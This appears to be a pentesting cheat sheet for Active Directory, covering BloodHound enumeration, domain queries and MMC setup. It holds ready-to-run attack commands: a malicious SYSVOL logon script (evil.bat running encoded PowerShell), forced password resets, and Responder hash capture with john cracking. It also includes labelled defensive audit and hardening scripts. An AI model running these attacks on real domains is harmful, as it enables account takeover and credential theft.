# Active Directory Pentesting

Active Directory (AD) is a directory service developed by Microsoft for Windows domain networks.

### Enumeration <a href="#enumeration" id="enumeration"></a>

#### Domain Controllers Discovery <a href="#domain-controllers-discovery" id="domain-controllers-discovery"></a>

```
dig @<target-ip> example.local ANY
gobuster dns -d example.local -w subdomains.txt -t 25
```

### Enumeration with BloodHound <a href="#enumeration-with-bloodhound" id="enumeration-with-bloodhound"></a>

#### 1. Run BloodHound <a href="#id-1-run-bloodhound" id="id-1-run-bloodhound"></a>

We use [BloodHound Community Edition](https://github.com/SpecterOps/BloodHound).\
The following commands start BloodHound with Docker Compose.

```
curl -L https://ghst.ly/getbhce > docker-compose.yml
sudo docker-compose down -v # If you want to reset the password of BloodHound...
sudo docker-compose pull && sudo docker-compose up
```

After that, we can use the web UI by browsing to `localhost:8080`.\
Log in with the username `admin` and the password that is printed in the log when the above command runs.

To bind to an arbitrary IP address and port, set these environment variables on the attack machine:

```
export BLOODHOUND_HOST=10.0.0.1
export BLOODHOUND_PORT=8090
```

#### 2. Collect Data <a href="#id-2-collect-data" id="id-2-collect-data"></a>

* **Option1. Using NetExec**

  If you already have `NetExec` on your machine, I think it is the easiest way.

  ```
  netexec ldap <target-ip> -d example.local -u username -p password --dns-server <target-ip> --bloodhound -c All
  ```
* **Option2. Using BloodHound.py**

  We can also use [BloodHound.py](https://github.com/dirkjanm/BloodHound.py).\
  Install it as follows:

  ```
  python3 -m venv .venv
  source .venv/bin/activate
  pipx install bloodhound # or using 'pip3' instead of 'pipx'
  bloodhound-python -h
  ```

  Then collect data:

  ```
  # -d: Domain
  # -u: Username
  # -p: Password
  # -dc: Domain Controller
  # -c all: Collect all data
  # -ns: Use an alternative nameserver
  bloodhound-python -d example.local -u username -p password -dc dc.example.local -c all -ns ns.example.local

  # If we cannot resolve the domain, try dnschef (https://github.com/iphelix/dnschef) to create a fake DNS by proxy.
  sudo python3 dnschef.py --fakeip <target-ip> --nameserver <target-ip>
  ```

#### 3. Upload Collected Data <a href="#id-3-upload-collected-data" id="id-3-upload-collected-data"></a>

After the collector finishes, the result files (`*.json`) are generated in the current directory. Upload all of these JSON files to BloodHound in the web browser.

We can then explore the relationships in the Active Directory.

### Investigation <a href="#investigation" id="investigation"></a>

```
# List all users
net user /domain
net user <username> /domain
Get-ADUser -Filter *
Get-ADUser -Identity <username> -Server dc.example.com -Properties *
Get-ADUser -Filter 'Name -like "*michael"' -Server dc.example.com | Format-Table Name,SamAccountName -A

# List all groups
net group /domain
net group "<group>" /domain
Get-ADGroup -Identity <group> -Server dc.example.com -Properties *
Get-ADGroupMember -Identity <group> -Server dc.example.com

# List the password policy
net accounts /domain

# List AD objects
$ChangeDate = New-Object DateTime(2022, 02, 28, 12, 00, 00)
Get-ADObject -Filter 'whenChanged -gt $ChangeDate' -includeDeletedObjects -Server dc.example.com

# Retrieve information about the given domain.
Get-ADDomain -Server dc.example.com

# Change the password of AD user
Set-ADAccountPassword -Identity <username> -Server dc.example.com -OldPassword (ConvertTo-SecureString -AsPlaintext "oldpass" -force) -NewPassword (ConvertTo-SecureString -AsPlaintext "newpass" -force)

# SYSVOL - A shared folder storing the Group Policy Objects (GPOs).
dir \\dc.example.com\SYSVOL\
```

### Abuse Logon Script for Other Users <a href="#abuse-logon-script-for-other-users" id="abuse-logon-script-for-other-users"></a>

If the current user has permission to write scripts in SYSVOL, we may be able to change other users' logon script path.

```
# 1. Check the permission
icacls C:\Windows\SYSVOL\sysvol\example.local\scripts\

# 2. Modify/Add a malicious script
'powershell -e <BASE64_COMMAND>' | Out-File -FilePath C:\Windows\SYSVOL\sysvol\example.local\scripts\evil.bat

# 3. Set logon script for the specified user
Set-ADUser -Identity VictimUser -ScriptPath '\\example.local\SYSVOL\example.local\scripts\evil.bat'
```

When the other user logs on, the `.bat` script will be executed.
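As an added defender-side check that is not part of the original page, the following PowerShell audits both preconditions of this technique: which accounts have a logon script set, whether any UNC script path points outside the expected SYSVOL scripts folder, and which non-default principals can write to that folder. It assumes the ActiveDirectory module is available and uses `example.local` as a placeholder domain.

```powershell
# Added example, not from the original page. Assumes the ActiveDirectory module;
# the domain name is a placeholder.
Import-Module ActiveDirectory

$Domain      = 'example.local'
$ScriptsPath = "\\$Domain\SYSVOL\$Domain\scripts"

# 1. Every account with a logon script, so an unexpected entry stands out.
$UsersWithScript = Get-ADUser -Filter 'scriptPath -like "*"' -Properties scriptPath |
    Select-Object SamAccountName, scriptPath
"Users with a logon script:"
$UsersWithScript | Format-Table -AutoSize

# UNC script paths that do not live under the expected scripts folder
# (a relative value such as 'logon.bat' resolves to NETLOGON and is left alone).
$Unexpected = $UsersWithScript | Where-Object {
    $_.scriptPath -like '\\*' -and $_.scriptPath -notlike "$ScriptsPath\*"
}
if ($Unexpected) {
    "Logon scripts outside ${ScriptsPath}:"
    $Unexpected | Format-Table -AutoSize
}

# 2. Principals that can write to the scripts folder. Anything beyond the
# built-in administrative identities is a finding to investigate.
$WriteMask = [System.Security.AccessControl.FileSystemRights]'Write, Modify, FullControl'
$Expected  = 'NT AUTHORITY\SYSTEM', 'BUILTIN\Administrators', 'CREATOR OWNER'
"Non-default principals with write access to ${ScriptsPath}:"
(Get-Acl -Path $ScriptsPath).Access |
    Where-Object { $_.AccessControlType -eq 'Allow' -and
                   (($_.FileSystemRights -band $WriteMask) -ne 0) } |
    Where-Object { $Expected -notcontains $_.IdentityReference.Value -and
                   $_.IdentityReference.Value -notlike '*\Domain Admins' } |
    Select-Object IdentityReference, FileSystemRights, IsInherited |
    Format-Table -AutoSize
```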

### Force Change Password Attack <a href="#force-change-password-attack" id="force-change-password-attack"></a>

If we have obtained a username/password pair and know other usernames, we might be able to change those users' passwords. The user we control needs the **GenericAll** permission over the target users to change their passwords.

```
# -U: User credential who has the permission to change another user password
# -I: Target IP
# -S: Target server name
net rpc password "TargetUserName" "myPassw0rd@123" -U "UserName"%"Password" -I "10.0.0.1" -S "EXAMPLE.LOCAL"
```

### Microsoft Management Console (mmc) <a href="#microsoft-management-console-mmc" id="microsoft-management-console-mmc"></a>

To set up the AD snap-ins in MMC, follow these instructions:

1. Right-click on the Windows icon.
2. Click **"Run"** and enter **"mmc"** then click **"OK"**.
3. In the MMC, click **"File → Add or Remove Snap-ins"**.
4. Add all three **"Active Directory…"** snap-ins.
5. Right-click on the **"Active Directory…"** in the left pane and select **"Change Forest"**.
6. Enter the domain as the Root domain and click OK.
7. Click on **"View → Advanced Features"**.

### Naming Convention <a href="#naming-convention" id="naming-convention"></a>

If we find a list of user names in Active Directory, we can derive candidate usernames by applying common naming conventions.\
For instance,

```
john smith   -> jsmith, j.smith, john.smith
michael pole -> mpole, m.pole, michael.pole
```

### SSH Login with AD Credentials <a href="#ssh-login-with-a-d-credentials" id="ssh-login-with-a-d-credentials"></a>

```
ssh dc.example.com\\<ad_username>@sub.dc.example.com
```

### Inject Credentials into Memory <a href="#inject-credentials-into-memory" id="inject-credentials-into-memory"></a>

```
# /netonly: All network communications will use these injected credentials for authentication.
runas.exe /netonly /user:<domain>\<username> cmd.exe
```

### DNS Configuration <a href="#dns-configuration" id="dns-configuration"></a>

```
# PowerShell
$dnsip = "<DC_IP>"
$index = Get-NetAdapter -Name 'Ethernet' | Select-Object -ExpandProperty 'ifIndex'
Set-DnsClientServerAddress -InterfaceIndex $index -ServerAddresses $dnsip
```

Now check if the configuration is set correctly.

```
nslookup dc.example.com
```

### Basic Knowledge <a href="#basic-knowledge" id="basic-knowledge"></a>

#### User Management <a href="#user-management" id="user-management"></a>

* **Delegation**

  In Active Directory, an administrator can delegate to another user the ability to manage users in an Organizational Unit (OU) without granting admin privileges.

  1. Setup
     1. Open "Active Directory Users and Computers".
     2. Right-click on the target OU and click “Delegate Control…”. A new window will open.
     3. In the window, enter the user to whom you want to delegate the privilege of managing users.
     4. Select the tasks the delegated user should be able to perform.
     5. Click OK.
  2. Manage Users
     1. Logon as the delegated user.
     2. For instance, if you want to reset John's password, execute the following command in PowerShell, then enter the new password at the prompt.

        ```
        Set-ADAccountPassword john -Reset -NewPassword (Read-Host -AsSecureString -Prompt 'New Password') -Verbose
        ```
     3. The first time John logs on after that, we want him to choose his own password rather than keep the one you entered. To enforce that, execute the following command.

        ```
        Set-ADUser -ChangePasswordAtLogon $true -Identity john -Verbose
        ```
     4. Now when John logs on, he will be prompted to set a new password.
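As an added check that is not part of the original page, this PowerShell lists which non-default principals hold rights over user objects that allow resetting their password: GenericAll, WriteDacl, WriteOwner, or the User-Force-Change-Password extended right. It serves both the Force Change Password attack above (who could perform that reset) and the Delegation setup (verifying what the wizard actually granted). It assumes the ActiveDirectory module, which provides the `AD:` drive, and uses a placeholder OU as the search base.

```powershell
# Added example, not from the original page. Assumes the ActiveDirectory module
# (which provides the AD: drive); the OU is a placeholder.
Import-Module ActiveDirectory
$SearchBase = 'OU=Staff,DC=example,DC=local'

# Schema GUID of the User-Force-Change-Password ("Reset Password") control access right.
$ResetPasswordGuid = [guid]'00299570-246d-11d0-a768-00aa006e0529'
# Identities expected to hold broad rights; everything else is reported.
$Expected = 'NT AUTHORITY\SYSTEM', 'BUILTIN\Administrators', 'NT AUTHORITY\SELF', 'CREATOR OWNER'
$Rights   = [System.DirectoryServices.ActiveDirectoryRights]

$Findings = foreach ($User in Get-ADUser -Filter * -SearchBase $SearchBase) {
    $Acl = Get-Acl -Path "AD:\$($User.DistinguishedName)"
    foreach ($Ace in $Acl.Access) {
        if ($Ace.AccessControlType -ne 'Allow') { continue }
        $Who = $Ace.IdentityReference.Value
        if ($Expected -contains $Who -or $Who -like '*\Domain Admins' -or $Who -like '*\Enterprise Admins') { continue }

        # An empty ObjectType on an ExtendedRight ACE grants every extended right,
        # including the password reset.
        $R = $Ace.ActiveDirectoryRights
        $Reason = if     ($R.HasFlag($Rights::GenericAll))  { 'GenericAll' }
                  elseif ($R.HasFlag($Rights::WriteDacl))   { 'WriteDacl' }
                  elseif ($R.HasFlag($Rights::WriteOwner))  { 'WriteOwner' }
                  elseif ($R.HasFlag($Rights::ExtendedRight) -and
                          ($Ace.ObjectType -eq $ResetPasswordGuid -or $Ace.ObjectType -eq [guid]::Empty)) { 'ForceChangePassword' }
        if ($Reason) {
            [pscustomobject]@{
                Target    = $User.SamAccountName
                Principal = $Who
                Right     = $Reason
                Inherited = $Ace.IsInherited
            }
        }
    }
}
$Findings | Sort-Object Principal, Target | Format-Table -AutoSize
```

A delegated help-desk group appearing with `ForceChangePassword` on the OU's users is the expected result of the Delegation wizard; any other principal with these rights is worth explaining or removing.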

### Intercept NetNTLM Authentication <a href="#intercept-netntlm-authentication" id="intercept-netntlm-authentication"></a>

Start Responder to listen for any LLMNR, NBT-NS, and WPAD requests.

```
sudo responder -I <interface-like-eth0>
```

Leave Responder running until it receives some requests.\
If you capture a NetNTLM hash, crack it on your local machine.

```
echo -n '<copied-NTLM-hash>' > hash.txt
john --format=netntlmv2 --wordlist=wordlist.txt hash.txt
```
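As an added mitigation example that is not part of the original page, this PowerShell reports the host-side settings that make Responder's poisoning possible and, when run with `-Remediate`, turns off LLMNR and NetBIOS over TCP/IP. It must run as an administrator; domain-wide, the LLMNR setting is normally delivered by the "Turn off multicast name resolution" DNS Client policy. WPAD is not covered here.

```powershell
# Added example, not from the original page. Run as administrator.
param([switch]$Remediate)

# LLMNR is controlled by the DNS Client policy value EnableMulticast (0 = off).
$LlmnrKey = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient'
$Llmnr = Get-ItemProperty -Path $LlmnrKey -Name EnableMulticast -ErrorAction SilentlyContinue
$LlmnrDisabled = [bool]($Llmnr -and $Llmnr.EnableMulticast -eq 0)
"LLMNR disabled by policy: $LlmnrDisabled"

# NetBIOS over TCP/IP is per adapter: TcpipNetbiosOptions 0 = from DHCP, 1 = enabled, 2 = disabled.
$Adapters = Get-CimInstance Win32_NetworkAdapterConfiguration -Filter 'IPEnabled = TRUE'
foreach ($A in $Adapters) {
    $State = switch ($A.TcpipNetbiosOptions) { 2 { 'disabled' } 1 { 'enabled' } default { 'from DHCP' } }
    "NetBIOS over TCP/IP on '$($A.Description)': $State"
}

if ($Remediate) {
    if (-not (Test-Path $LlmnrKey)) { New-Item -Path $LlmnrKey -Force | Out-Null }
    Set-ItemProperty -Path $LlmnrKey -Name EnableMulticast -Value 0 -Type DWord
    foreach ($A in $Adapters) {
        # SetTcpipNetbios(2) disables NetBIOS over TCP/IP on this adapter.
        Invoke-CimMethod -InputObject $A -MethodName SetTcpipNetbios `
            -Arguments @{ TcpipNetbiosOptions = 2 } | Out-Null
    }
    "Remediated: LLMNR and NetBIOS over TCP/IP are now disabled on this host."
}
```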

### References <a href="#references" id="references"></a>

* [TryHackMe](https://tryhackme.com/room/adenumeration)
* [S1ckB0y1337](https://github.com/S1ckB0y1337/Active-Directory-Exploitation-Cheat-Sheet)
